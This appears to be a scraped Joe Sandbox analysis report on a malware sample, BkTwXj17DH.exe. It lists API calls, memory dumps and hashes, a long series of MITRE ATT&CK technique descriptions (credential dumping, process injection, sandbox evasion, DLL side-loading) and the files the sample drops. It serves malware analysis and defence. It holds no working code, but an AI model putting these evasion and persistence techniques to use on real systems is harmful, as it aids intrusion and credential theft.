SetLastError.KERNEL32(00000000,76C1B38F,00000000,00000000), ref: 00D861CA
SetLastError.KERNEL32(00000000,76C1B38F,00000000,00000000), ref: 00D861D6
_abort.LIBCMT ref: 00D861DC

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 1b45ba13e3c46e431935839bb86c4fc1624f33c920d9b281ec39e5db6c13f811
Instruction ID: 8c65815d87e50fd656bce63b41cb48200a3583848245dcb3a075fdcc2d9141cb
Opcode Fuzzy Hash: 1b45ba13e3c46e431935839bb86c4fc1624f33c920d9b281ec39e5db6c13f811
Instruction Fuzzy Hash: 24F0A435604B01E6C21237297C0EB2F2659CFC1B71F2A0116F919D629BFF60C8025335

Function 00D910B5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D9112B
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00D91163

Strings

regutil.cpp, xrefs: 00D911A9

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: QueryValue
String ID: regutil.cpp
API String ID: 3660427363-955085611
Opcode ID: 7e50134b1ce0a6bf024cc088d70f7b80a6be5af120a092f279a9fa51e4eec78d
Instruction ID: 3c32a797301c35291c7c1f5a17192d8ac0128c9b562bdac4207736d76b29c8ce
Opcode Fuzzy Hash: 7e50134b1ce0a6bf024cc088d70f7b80a6be5af120a092f279a9fa51e4eec78d
Instruction Fuzzy Hash: 4541603AE0022BFBDF219F958C419AEBBB9EF04350F144169EE11B7250D7719E149BB0

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BkTwXj17DH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\1ebe34d1

C:\Users\user\AppData\Local\Temp\2f360cd0

C:\Users\user\AppData\Local\Temp\3713da8f

C:\Users\user\AppData\Local\Temp\Cermet_20241114135705.log

C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

C:\Users\user\AppData\Local\Temp\dykhaneiil

C:\Users\user\AppData\Local\Temp\tlwqrc

C:\Users\user\AppData\Local\Temp\xsnxlhd

C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe

C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Core.dll

C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Gui.dll

C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Network.dll

C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5PrintSupport.dll

C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Widgets.dll

C:\Users\user\AppData\Roaming\MonitorBrowser2\StarBurn.dll

C:\Users\user\AppData\Roaming\MonitorBrowser2\dcfa

C:\Users\user\AppData\Roaming\MonitorBrowser2\msvcp140.dll

Windows Analysis Report
BkTwXj17DH.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre